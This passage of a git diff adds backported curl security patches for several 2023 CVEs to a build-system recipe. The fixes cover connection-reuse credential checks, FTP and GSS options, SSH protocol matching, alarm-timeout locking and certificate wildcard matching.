+-           !Curl_safecmp(needle->oauth_bearer, check->oauth_bearer)) {			
++        if(Curl_timestrcmp(needle->user, check->user) ||
++           Curl_timestrcmp(needle->passwd, check->passwd) ||
++           Curl_timestrcmp(needle->sasl_authzid, check->sasl_authzid) ||
++           Curl_timestrcmp(needle->oauth_bearer, check->oauth_bearer)) {			
+           /* one of them was different */
+           continue;
+         }
+@@ -1326,8 +1317,8 @@ ConnectionExists(struct Curl_easy *data,
+            possible. (Especially we must not reuse the same connection if
+            partway through a handshake!) */
+         if(wantNTLMhttp) {
+-          if(strcmp(needle->user, check->user) ||
+-             strcmp(needle->passwd, check->passwd)) {
++          if(Curl_timestrcmp(needle->user, check->user) ||
++             Curl_timestrcmp(needle->passwd, check->passwd)) {
+ 
+             /* we prefer a credential match, but this is at least a connection
+                that can be reused and "upgraded" to NTLM */
+@@ -1348,8 +1339,10 @@ ConnectionExists(struct Curl_easy *data,
+           if(!check->http_proxy.user || !check->http_proxy.passwd)
+             continue;
+ 
+-          if(strcmp(needle->http_proxy.user, check->http_proxy.user) ||
+-             strcmp(needle->http_proxy.passwd, check->http_proxy.passwd))
++          if(Curl_timestrcmp(needle->http_proxy.user,
++                             check->http_proxy.user) ||
++             Curl_timestrcmp(needle->http_proxy.passwd,
++                             check->http_proxy.passwd))
+             continue;
+         }
+         else if(check->proxy_ntlm_state != NTLMSTATE_NONE) {
+diff --git a/lib/vauth/digest_sspi.c b/lib/vauth/digest_sspi.c
+index a109056..3986386 100644
+--- a/lib/vauth/digest_sspi.c
++++ b/lib/vauth/digest_sspi.c
+@@ -450,8 +450,8 @@ CURLcode Curl_auth_create_digest_http_message(struct Curl_easy *data,
+      has changed then delete that context. */
+   if((userp && !digest->user) || (!userp && digest->user) ||
+      (passwdp && !digest->passwd) || (!passwdp && digest->passwd) ||
+-     (userp && digest->user && strcmp(userp, digest->user)) ||
+-     (passwdp && digest->passwd && strcmp(passwdp, digest->passwd))) {
++     (userp && digest->user && Curl_timestrcmp(userp, digest->user)) ||
++     (passwdp && digest->passwd && Curl_timestrcmp(passwdp, digest->passwd))) {
+     if(digest->http_context) {
+       s_pSecFn->DeleteSecurityContext(digest->http_context);
+       Curl_safefree(digest->http_context);
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index e8cb70f..70a9391 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -98,9 +98,15 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
+      Curl_safecmp(data->issuercert, needle->issuercert) &&
+      Curl_safecmp(data->clientcert, needle->clientcert) &&
+      Curl_safecmp(data->random_file, needle->random_file) &&
+-     Curl_safecmp(data->egdsocket, needle->egdsocket) &&     
++     Curl_safecmp(data->egdsocket, needle->egdsocket) &&    
++#ifdef USE_TLS_SRP 
++     !Curl_timestrcmp(data->username, needle->username) &&    
++     !Curl_timestrcmp(data->password, needle->password) &&    
++     (data->authtype == needle->authtype) &&   
++#endif 
+      Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
+      Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
++     Curl_safe_strcasecompare(data->CRLfile, needle->CRLfile) &&
+      Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))
+     return TRUE;
+ 
+@@ -117,6 +123,9 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
+   dest->verifyhost = source->verifyhost;
+   dest->verifystatus = source->verifystatus;
+   dest->sessionid = source->sessionid;
++#ifdef USE_TLS_SRP
++  dest->authtype = source->authtype;
++#endif
+ 
+   CLONE_STRING(CApath);
+   CLONE_STRING(CAfile);
+@@ -127,6 +136,11 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
+   CLONE_STRING(cipher_list);
+   CLONE_STRING(cipher_list13);
+   CLONE_STRING(pinned_key);
++  CLONE_STRING(CRLfile);
++#ifdef USE_TLS_SRP
++  CLONE_STRING(username);
++  CLONE_STRING(password);
++#endif
+ 
+   return TRUE;
+ }
+@@ -142,6 +156,11 @@ void Curl_free_primary_ssl_config(struct ssl_primary_config* sslc)
+   Curl_safefree(sslc->cipher_list);
+   Curl_safefree(sslc->cipher_list13);
+   Curl_safefree(sslc->pinned_key);
++  Curl_safefree(sslc->CRLfile);
++#ifdef USE_TLS_SRP
++  Curl_safefree(sslc->username);
++  Curl_safefree(sslc->password);
++#endif
+ }
+ 
+ #ifdef USE_SSL
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27535.patch b/meta/recipes-support/curl/curl/CVE-2023-27535.patch
new file mode 100644
index 0000000000..e38390a57c
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27535.patch
@@ -0,0 +1,170 @@
+From 8f4608468b890dce2dad9f91d5607ee7e9c1aba1 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 9 Mar 2023 17:47:06 +0100
+Subject: [PATCH] ftp: add more conditions for connection reuse
+
+Reported-by: Harry Sintonen
+Closes #10730
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2023-27535.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/curl/curl/commit/8f4608468b890dce2dad9f91d5607ee7e9c1aba1]
+CVE: CVE-2023-27535
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/ftp.c     | 30 ++++++++++++++++++++++++++++--
+ lib/ftp.h     |  5 +++++
+ lib/setopt.c  |  2 +-
+ lib/url.c     | 16 +++++++++++++++-
+ lib/urldata.h |  4 ++--
+ 5 files changed, 51 insertions(+), 6 deletions(-)
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 31a34e8..7a82a74 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -4059,6 +4059,10 @@ static CURLcode ftp_disconnect(struct connectdata *conn, bool dead_connection)
+   }
+ 
+   freedirs(ftpc);
++  free(ftpc->account);
++  ftpc->account = NULL;
++  free(ftpc->alternative_to_user);
++  ftpc->alternative_to_user = NULL;
+   free(ftpc->prevpath);
+   ftpc->prevpath = NULL;
+   free(ftpc->server_os);
+@@ -4326,11 +4330,31 @@ static CURLcode ftp_setup_connection(struct connectdata *conn)
+   struct Curl_easy *data = conn->data;
+   char *type;
+   struct FTP *ftp;
++  struct ftp_conn *ftpc = &conn->proto.ftpc;
+ 
+-  conn->data->req.protop = ftp = calloc(sizeof(struct FTP), 1);
++  ftp = calloc(sizeof(struct FTP), 1);
+   if(NULL == ftp)
+     return CURLE_OUT_OF_MEMORY;
+ 
++  /* clone connection related data that is FTP specific */
++  if(data->set.str[STRING_FTP_ACCOUNT]) {
++    ftpc->account = strdup(data->set.str[STRING_FTP_ACCOUNT]);
++    if(!ftpc->account) {
++      free(ftp);
++      return CURLE_OUT_OF_MEMORY;
++    }
++  }
++  if(data->set.str[STRING_FTP_ALTERNATIVE_TO_USER]) {
++    ftpc->alternative_to_user =
++      strdup(data->set.str[STRING_FTP_ALTERNATIVE_TO_USER]);
++    if(!ftpc->alternative_to_user) {
++      Curl_safefree(ftpc->account);
++      free(ftp);
++      return CURLE_OUT_OF_MEMORY;
++    }
++  }
++  conn->data->req.protop = ftp;
++
+   ftp->path = &data->state.up.path[1]; /* don't include the initial slash */
+ 
+   /* FTP URLs support an extension like ";type=<typecode>" that
+@@ -4366,7 +4390,9 @@ static CURLcode ftp_setup_connection(struct connectdata *conn)
+   /* get some initial data into the ftp struct */
+   ftp->transfer = FTPTRANSFER_BODY;
+   ftp->downloadsize = 0;
+-  conn->proto.ftpc.known_filesize = -1; /* unknown size for now */
++  ftpc->known_filesize = -1; /* unknown size for now */
++  ftpc->use_ssl = data->set.use_ssl;
++  ftpc->ccc = data->set.ftp_ccc;
+ 
+   return CURLE_OK;
+ }
+diff --git a/lib/ftp.h b/lib/ftp.h
+index 984347f..163dcb3 100644
+--- a/lib/ftp.h
++++ b/lib/ftp.h
+@@ -116,6 +116,8 @@ struct FTP {
+    struct */
+ struct ftp_conn {
+   struct pingpong pp;
++  char *account;
++  char *alternative_to_user;
+   char *entrypath; /* the PWD reply when we logged on */
+   char **dirs;   /* realloc()ed array for path components */
+   int dirdepth;  /* number of entries used in the 'dirs' array */
+@@ -141,6 +143,9 @@ struct ftp_conn {
+   ftpstate state; /* always use ftp.c:state() to change state! */
+   ftpstate state_saved; /* transfer type saved to be reloaded after
+                            data connection is established */
++  unsigned char use_ssl;   /* if AUTH TLS is to be attempted etc, for FTP or
++                              IMAP or POP3 or others! (type: curl_usessl)*/
++  unsigned char ccc;       /* ccc level for this connection */
+   curl_off_t retr_size_saved; /* Size of retrieved file saved */
+   char *server_os;     /* The target server operating system. */
+   curl_off_t known_filesize; /* file size is different from -1, if wildcard
+diff --git a/lib/setopt.c b/lib/setopt.c
+index 4d96f6b..a91bb70 100644
+--- a/lib/setopt.c
++++ b/lib/setopt.c
+@@ -2126,7 +2126,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+     arg = va_arg(param, long);
+     if((arg < CURLUSESSL_NONE) || (arg >= CURLUSESSL_LAST))
+       return CURLE_BAD_FUNCTION_ARGUMENT;
+-    data->set.use_ssl = (curl_usessl)arg;
++    data->set.use_ssl = (unsigned char)arg;
+     break;
+ 
+   case CURLOPT_SSL_OPTIONS:
+diff --git a/lib/url.c b/lib/url.c
+index dfbde3b..f84375c 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1257,10 +1257,24 @@ ConnectionExists(struct Curl_easy *data,
+         }
+       }
+ 
+-      if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
++#ifdef USE_SSH
++      else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
+         if(!ssh_config_matches(needle, check))
+           continue;
+       }
++#endif
++#ifndef CURL_DISABLE_FTP
++      else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_FTP) {
++        /* Also match ACCOUNT, ALTERNATIVE-TO-USER, USE_SSL and CCC options */
++        if(Curl_timestrcmp(needle->proto.ftpc.account,
++                           check->proto.ftpc.account) ||
++           Curl_timestrcmp(needle->proto.ftpc.alternative_to_user,
++                           check->proto.ftpc.alternative_to_user) ||
++           (needle->proto.ftpc.use_ssl != check->proto.ftpc.use_ssl) ||
++           (needle->proto.ftpc.ccc != check->proto.ftpc.ccc))
++          continue;
++      }
++#endif
+ 
+       if(!needle->bits.httpproxy || (needle->handler->flags&PROTOPT_SSL) ||
+          needle->bits.tunnel_proxy) {
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 168f874..51b793b 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1730,8 +1730,6 @@ struct UserDefined {
+   void *ssh_keyfunc_userp;         /* custom pointer to callback */
+   enum CURL_NETRC_OPTION
+        use_netrc;        /* defined in include/curl.h */
+-  curl_usessl use_ssl;   /* if AUTH TLS is to be attempted etc, for FTP or
+-                            IMAP or POP3 or others! */
+   long new_file_perms;    /* Permissions to use when creating remote files */
+   long new_directory_perms; /* Permissions to use when creating remote dirs */
+   long ssh_auth_types;   /* allowed SSH auth types */
+@@ -1851,6 +1849,8 @@ struct UserDefined {
+   BIT(http09_allowed); /* allow HTTP/0.9 responses */
+   BIT(mail_rcpt_allowfails); /* allow RCPT TO command to fail for some
+                                 recipients */
++  unsigned char use_ssl;   /* if AUTH TLS is to be attempted etc, for FTP or
++                              IMAP or POP3 or others! (type: curl_usessl)*/
+ };
+ 
+ struct Names {
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27536.patch b/meta/recipes-support/curl/curl/CVE-2023-27536.patch
new file mode 100644
index 0000000000..b04a77de25
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27536.patch
@@ -0,0 +1,55 @@
+From cb49e67303dbafbab1cebf4086e3ec15b7d56ee5 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Fri, 10 Mar 2023 09:22:43 +0100
+Subject: [PATCH] url: only reuse connections with same GSS delegation
+
+Reported-by: Harry Sintonen
+Closes #10731
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/cb49e67303dbafbab1cebf4086e3ec15b7d56ee5]
+CVE: CVE-2023-27536
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/url.c     | 6 ++++++
+ lib/urldata.h | 1 +
+ 2 files changed, 7 insertions(+)
+
+diff --git a/lib/url.c b/lib/url.c
+index f84375c..87f4eb0 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1257,6 +1257,11 @@ ConnectionExists(struct Curl_easy *data,
+         }
+       }
+ 
++      /* GSS delegation differences do not actually affect every connection
++         and auth method, but this check takes precaution before efficiency */
++      if(needle->gssapi_delegation != check->gssapi_delegation)
++	continue;
++
+ #ifdef USE_SSH
+       else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
+         if(!ssh_config_matches(needle, check))
+@@ -1708,6 +1713,7 @@ static struct connectdata *allocate_conn(struct Curl_easy *data)
+   conn->fclosesocket = data->set.fclosesocket;
+   conn->closesocket_client = data->set.closesocket_client;
+   conn->lastused = Curl_now(); /* used now */
++  conn->gssapi_delegation = data->set.gssapi_delegation;
+ 
+   return conn;
+   error:
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 51b793b..b8a611b 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1118,6 +1118,7 @@ struct connectdata {
+                               handle */
+   BIT(sock_accepted); /* TRUE if the SECONDARYSOCKET was created with
+                          accept() */
++  long gssapi_delegation; /* inherited from set.gssapi_delegation */
+ };
+ 
+ /* The end of connectdata. */
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27538.patch b/meta/recipes-support/curl/curl/CVE-2023-27538.patch
new file mode 100644
index 0000000000..6c40989d3b
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27538.patch
@@ -0,0 +1,31 @@
+From af369db4d3833272b8ed443f7fcc2e757a0872eb Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Fri, 10 Mar 2023 08:22:51 +0100
+Subject: [PATCH] url: fix the SSH connection reuse check
+
+Reported-by: Harry Sintonen
+Closes #10735
+
+CVE: CVE-2023-27538
+Upstream-Status: Backport [https://github.com/curl/curl/commit/af369db4d3833272b8ed443f7fcc2e757a0872eb]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/url.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/url.c b/lib/url.c
+index 8da0245..9f14a7b 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1266,7 +1266,7 @@ ConnectionExists(struct Curl_easy *data,
+         }
+       }
+ 
+-      if(get_protocol_family(needle->handler->protocol) == PROTO_FAMILY_SSH) {
++      if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
+         if(!ssh_config_matches(needle, check))
+           continue;
+       }
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch b/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch
new file mode 100644
index 0000000000..eaa6fdc327
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch
@@ -0,0 +1,197 @@
+From f446258f0269a62289cca0210157cb8558d0edc3 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 16 May 2023 23:40:42 +0200
+Subject: [PATCH] hostip: include easy_lock.h before using
+ GLOBAL_INIT_IS_THREADSAFE
+
+Since that header file is the only place that define can be defined.
+
+Reported-by: Marc Deslauriers
+
+Follow-up to 13718030ad4b3209
+
+Closes #11121
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/f446258f0269a62289cca0210157cb8558d0edc3]
+CVE: CVE-2023-28320
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ lib/easy_lock.h | 109 ++++++++++++++++++++++++++++++++++++++++++++++++
+ lib/hostip.c    |  10 ++---
+ lib/hostip.h    |   9 ----
+ 3 files changed, 113 insertions(+), 15 deletions(-)
+ create mode 100644 lib/easy_lock.h
+
+diff --git a/lib/easy_lock.h b/lib/easy_lock.h
+new file mode 100644
+index 0000000..6399a39
+--- /dev/null
++++ b/lib/easy_lock.h
+@@ -0,0 +1,109 @@
++#ifndef HEADER_CURL_EASY_LOCK_H
++#define HEADER_CURL_EASY_LOCK_H
++/***************************************************************************
++ *                                  _   _ ____  _
++ *  Project                     ___| | | |  _ \| |
++ *                             / __| | | | |_) | |
++ *                            | (__| |_| |  _ <| |___
++ *                             \___|\___/|_| \_\_____|
++ *
++ * Copyright (C) Daniel Stenberg, <daniel@haxx.se>, et al.
++ *
++ * This software is licensed as described in the file COPYING, which
++ * you should have received as part of this distribution. The terms
++ * are also available at https://curl.se/docs/copyright.html.
++ *
++ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
++ * copies of the Software, and permit persons to whom the Software is
++ * furnished to do so, under the terms of the COPYING file.
++ *
++ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
++ * KIND, either express or implied.
++ *
++ * SPDX-License-Identifier: curl
++ *
++ ***************************************************************************/
++
++#include "curl_setup.h"
++
++#define GLOBAL_INIT_IS_THREADSAFE
++
++#if defined(_WIN32_WINNT) && _WIN32_WINNT >= 0x600
++
++#ifdef __MINGW32__
++#ifndef __MINGW64_VERSION_MAJOR
++#if (__MINGW32_MAJOR_VERSION < 5) || \
++    (__MINGW32_MAJOR_VERSION == 5 && __MINGW32_MINOR_VERSION == 0)
++/* mingw >= 5.0.1 defines SRWLOCK, and slightly different from MS define */
++typedef PVOID SRWLOCK, *PSRWLOCK;
++#endif
++#endif
++#ifndef SRWLOCK_INIT
++#define SRWLOCK_INIT NULL
++#endif
++#endif /* __MINGW32__ */
++
++#define curl_simple_lock SRWLOCK
++#define CURL_SIMPLE_LOCK_INIT SRWLOCK_INIT
++
++#define curl_simple_lock_lock(m) AcquireSRWLockExclusive(m)
++#define curl_simple_lock_unlock(m) ReleaseSRWLockExclusive(m)
++
++#elif defined(HAVE_ATOMIC) && defined(HAVE_STDATOMIC_H)
++#include <stdatomic.h>
++#if defined(HAVE_SCHED_YIELD)
++#include <sched.h>
++#endif
++
++#define curl_simple_lock atomic_int
++#define CURL_SIMPLE_LOCK_INIT 0
++
++/* a clang-thing */
++#ifndef __has_builtin
++#define __has_builtin(x) 0
++#endif
++
++#ifndef __INTEL_COMPILER
++/* The Intel compiler tries to look like GCC *and* clang *and* lies in its
++   __has_builtin() function, so override it. */
++
++/* if GCC on i386/x86_64 or if the built-in is present */
++#if ( (defined(__GNUC__) && !defined(__clang__)) &&     \
++      (defined(__i386__) || defined(__x86_64__))) ||    \
++  __has_builtin(__builtin_ia32_pause)
++#define HAVE_BUILTIN_IA32_PAUSE
++#endif
++
++#endif
++
++static inline void curl_simple_lock_lock(curl_simple_lock *lock)
++{
++  for(;;) {
++    if(!atomic_exchange_explicit(lock, true, memory_order_acquire))
++      break;
++    /* Reduce cache coherency traffic */
++    while(atomic_load_explicit(lock, memory_order_relaxed)) {
++      /* Reduce load (not mandatory) */
++#ifdef HAVE_BUILTIN_IA32_PAUSE
++      __builtin_ia32_pause();
++#elif defined(__aarch64__)
++      __asm__ volatile("yield" ::: "memory");
++#elif defined(HAVE_SCHED_YIELD)
++      sched_yield();
++#endif
++    }
++  }
++}
++
++static inline void curl_simple_lock_unlock(curl_simple_lock *lock)
++{
++  atomic_store_explicit(lock, false, memory_order_release);
++}
++
++#else
++
++#undef  GLOBAL_INIT_IS_THREADSAFE
++
++#endif
++
++#endif /* HEADER_CURL_EASY_LOCK_H */
+diff --git a/lib/hostip.c b/lib/hostip.c
+index 5231a74..d5bf881 100644
+--- a/lib/hostip.c
++++ b/lib/hostip.c
+@@ -68,6 +68,8 @@
+ #include "curl_memory.h"
+ #include "memdebug.h"
+ 
++#include "easy_lock.h"
++
+ #if defined(CURLRES_SYNCH) &&                   \
+   defined(HAVE_ALARM) &&                        \
+   defined(SIGALRM) &&                           \
+@@ -77,10 +79,6 @@
+ #define USE_ALARM_TIMEOUT
+ #endif
+ 
+-#ifdef USE_ALARM_TIMEOUT
+-#include "easy_lock.h"
+-#endif
+-
+ #define MAX_HOSTCACHE_LEN (255 + 7) /* max FQDN + colon + port number + zero */
+ 
+ /*
+@@ -259,8 +257,8 @@ void Curl_hostcache_prune(struct Curl_easy *data)
+ /* Beware this is a global and unique instance. This is used to store the
+    return address that we can jump back to from inside a signal handler. This
+    is not thread-safe stuff. */
+-sigjmp_buf curl_jmpenv;
+-curl_simple_lock curl_jmpenv_lock;
++static sigjmp_buf curl_jmpenv;
++static curl_simple_lock curl_jmpenv_lock;
+ #endif
+ 
+ /* lookup address, returns entry if found and not stale */
+diff --git a/lib/hostip.h b/lib/hostip.h
+index baf1e58..d7f73d9 100644
+--- a/lib/hostip.h
++++ b/lib/hostip.h
+@@ -196,15 +196,6 @@ Curl_cache_addr(struct Curl_easy *data, Curl_addrinfo *addr,
+ #define CURL_INADDR_NONE INADDR_NONE
+ #endif
+ 
+-#ifdef HAVE_SIGSETJMP
+-/* Forward-declaration of variable defined in hostip.c. Beware this
+- * is a global and unique instance. This is used to store the return
+- * address that we can jump back to from inside a signal handler.
+- * This is not thread-safe stuff.
+- */
+-extern sigjmp_buf curl_jmpenv;
+-#endif
+-
+ /*
+  * Function provided by the resolver backend to set DNS servers to use.
+  */
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28320.patch b/meta/recipes-support/curl/curl/CVE-2023-28320.patch
new file mode 100644
index 0000000000..0c9b67440a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28320.patch
@@ -0,0 +1,86 @@
+From 13718030ad4b3209a7583b4f27f683cd3a6fa5f2 Mon Sep 17 00:00:00 2001
+From: Harry Sintonen <sintonen@iki.fi>
+Date: Tue, 25 Apr 2023 09:22:26 +0200
+Subject: [PATCH] hostip: add locks around use of global buffer for alarm()
+
+When building with the sync name resolver and timeout ability we now
+require thread-safety to be present to enable it.
+
+Closes #11030
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/13718030ad4b3209a7583b4f27f683cd3a6fa5f2]
+CVE: CVE-2023-28320
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ lib/hostip.c | 19 +++++++++++++++----
+ 1 file changed, 15 insertions(+), 4 deletions(-)
+
+diff --git a/lib/hostip.c b/lib/hostip.c
+index f5bb634..5231a74 100644
+--- a/lib/hostip.c
++++ b/lib/hostip.c
+@@ -68,12 +68,19 @@
+ #include "curl_memory.h"
+ #include "memdebug.h"
+ 
+-#if defined(CURLRES_SYNCH) && \
+-    defined(HAVE_ALARM) && defined(SIGALRM) && defined(HAVE_SIGSETJMP)
++#if defined(CURLRES_SYNCH) &&                   \
++  defined(HAVE_ALARM) &&                        \
++  defined(SIGALRM) &&                           \
++  defined(HAVE_SIGSETJMP) &&                    \
++  defined(GLOBAL_INIT_IS_THREADSAFE)
+ /* alarm-based timeouts can only be used with all the dependencies satisfied */
+ #define USE_ALARM_TIMEOUT
+ #endif
+ 
++#ifdef USE_ALARM_TIMEOUT
++#include "easy_lock.h"
++#endif
++
+ #define MAX_HOSTCACHE_LEN (255 + 7) /* max FQDN + colon + port number + zero */
+ 
+ /*
+@@ -248,11 +255,12 @@ void Curl_hostcache_prune(struct Curl_easy *data)
+     Curl_share_unlock(data, CURL_LOCK_DATA_DNS);
+ }
+ 
+-#ifdef HAVE_SIGSETJMP
++#ifdef USE_ALARM_TIMEOUT
+ /* Beware this is a global and unique instance. This is used to store the
+    return address that we can jump back to from inside a signal handler. This
+    is not thread-safe stuff. */
+ sigjmp_buf curl_jmpenv;
++curl_simple_lock curl_jmpenv_lock;
+ #endif
+ 
+ /* lookup address, returns entry if found and not stale */
+@@ -614,7 +622,6 @@ enum resolve_t Curl_resolv(struct connectdata *conn,
+ static
+ RETSIGTYPE alarmfunc(int sig)
+ {
+-  /* this is for "-ansi -Wall -pedantic" to stop complaining!   (rabe) */
+   (void)sig;
+   siglongjmp(curl_jmpenv, 1);
+ }
+@@ -695,6 +702,8 @@ enum resolve_t Curl_resolv_timeout(struct connectdata *conn,
+      This should be the last thing we do before calling Curl_resolv(),
+      as otherwise we'd have to worry about variables that get modified
+      before we invoke Curl_resolv() (and thus use "volatile"). */
++  curl_simple_lock_lock(&curl_jmpenv_lock);
++
+   if(sigsetjmp(curl_jmpenv, 1)) {
+     /* this is coming from a siglongjmp() after an alarm signal */
+     failf(data, "name lookup timed out");
+@@ -763,6 +772,8 @@ clean_up:
+ #endif
+ #endif /* HAVE_SIGACTION */
+ 
++  curl_simple_lock_unlock(&curl_jmpenv_lock);
++
+   /* switch back the alarm() to either zero or to what it was before minus
+      the time we spent until now! */
+   if(prev_alarm) {
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28321.patch b/meta/recipes-support/curl/curl/CVE-2023-28321.patch
new file mode 100644
index 0000000000..da1d1fdcd6
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28321.patch
@@ -0,0 +1,272 @@
+Upstream-Status: Backport [import from ubuntu curl_7.68.0-1ubuntu2.20 with
+minor change to tests/data/test1397 part so the patch can be apply.
+upstream: https://github.com/curl/curl/commit/199f2d440d8659b42 ]
+CVE: CVE-2023-28321
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+This backport was obtained from SUSE.
+
+From 199f2d440d8659b42670c1b796220792b01a97bf Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 24 Apr 2023 21:07:02 +0200
+Subject: [PATCH] hostcheck: fix host name wildcard checking
+
+The leftmost "label" of the host name can now only match against single
+'*'. Like the browsers have worked for a long time.
+
+- extended unit test 1397 for this
+- move some SOURCE variables from unit/Makefile.am to unit/Makefile.inc
+
+Reported-by: Hiroki Kurosawa
+Closes #11018
+---
+ lib/hostcheck.c         |  50 +++++++--------
+ tests/data/test1397     |  10 ++-
+ tests/unit/Makefile.am  |  94 ----------------------------
+ tests/unit/Makefile.inc |  94 ++++++++++++++++++++++++++++
+ tests/unit/unit1397.c   | 134 ++++++++++++++++++++++++----------------
+ 5 files changed, 202 insertions(+), 180 deletions(-)
+
+--- a/lib/hostcheck.c
++++ b/lib/hostcheck.c
+@@ -58,15 +58,19 @@
+  * apparent distinction between a name and an IP. We need to detect the use of
+  * an IP address and not wildcard match on such names.
+  *
++ * Only match on "*" being used for the leftmost label, not "a*", "a*b" nor
++ * "*b".
++ *
++ * @unittest: 1397
++ *
+  * NOTE: hostmatch() gets called with copied buffers so that it can modify the
+  * contents at will.
+  */
+ 
+ static int hostmatch(char *hostname, char *pattern)
+ {
+-  const char *pattern_label_end, *pattern_wildcard, *hostname_label_end;
+-  int wildcard_enabled;
+-  size_t prefixlen, suffixlen;
++  const char *pattern_label_end, *hostname_label_end;
++  size_t suffixlen;
+   struct in_addr ignored;
+ #ifdef ENABLE_IPV6
+   struct sockaddr_in6 si6;
+@@ -80,13 +84,12 @@ static int hostmatch(char *hostname, cha
+   if(pattern[len-1]=='.')
+     pattern[len-1] = 0;
+ 
+-  pattern_wildcard = strchr(pattern, '*');
+-  if(pattern_wildcard == NULL)
++  if(strncmp(pattern, "*.", 2))
+     return strcasecompare(pattern, hostname) ?
+       CURL_HOST_MATCH : CURL_HOST_NOMATCH;
+ 
+   /* detect IP address as hostname and fail the match if so */
+-  if(Curl_inet_pton(AF_INET, hostname, &ignored) > 0)
++  else if(Curl_inet_pton(AF_INET, hostname, &ignored) > 0)
+     return CURL_HOST_NOMATCH;
+ #ifdef ENABLE_IPV6
+   if(Curl_inet_pton(AF_INET6, hostname, &si6.sin6_addr) > 0)
+@@ -95,14 +98,9 @@ static int hostmatch(char *hostname, cha
+ 
+   /* We require at least 2 dots in pattern to avoid too wide wildcard
+      match. */
+-  wildcard_enabled = 1;
+   pattern_label_end = strchr(pattern, '.');
+-  if(pattern_label_end == NULL || strchr(pattern_label_end + 1, '.') == NULL ||
+-     pattern_wildcard > pattern_label_end ||
+-     strncasecompare(pattern, "xn--", 4)) {
+-    wildcard_enabled = 0;
+-  }
+-  if(!wildcard_enabled)
++  if(pattern_label_end == NULL ||
++     strchr(pattern_label_end + 1, '.') == NULL)
+     return strcasecompare(pattern, hostname) ?
+       CURL_HOST_MATCH : CURL_HOST_NOMATCH;
+ 
+@@ -117,11 +115,9 @@ static int hostmatch(char *hostname, cha
+   if(hostname_label_end - hostname < pattern_label_end - pattern)
+     return CURL_HOST_NOMATCH;
+ 
+-  prefixlen = pattern_wildcard - pattern;
+-  suffixlen = pattern_label_end - (pattern_wildcard + 1);
+-  return strncasecompare(pattern, hostname, prefixlen) &&
+-    strncasecompare(pattern_wildcard + 1, hostname_label_end - suffixlen,
+-                    suffixlen) ?
++  suffixlen = pattern_label_end - (pattern + 1);
++  return strncasecompare(pattern + 1, hostname_label_end - suffixlen,
++                         suffixlen) ?
+     CURL_HOST_MATCH : CURL_HOST_NOMATCH;
+ }
+ 
+--- a/tests/data/test1397
++++ b/tests/data/test1397
+@@ -2,8 +2,7 @@
+ <info>
+ <keywords>
+ unittest
+-ssl
+-wildcard
++Curl_cert_hostcheck
+ </keywords>
+ </info>
+ 
+@@ -16,9 +15,8 @@ none
+ <features>
+ unittest
+ </features>
+- <name>
+-Check wildcard certificate matching function Curl_cert_hostcheck
+- </name>
